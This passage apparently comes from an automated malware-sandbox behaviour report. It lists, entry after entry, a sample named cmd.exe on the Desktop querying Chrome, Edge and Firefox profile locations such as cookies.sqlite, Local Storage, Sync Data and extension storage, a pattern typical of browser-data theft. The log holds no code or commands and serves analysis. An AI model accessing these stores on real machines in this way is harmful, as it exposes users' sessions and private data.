              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil | VolumeInformation
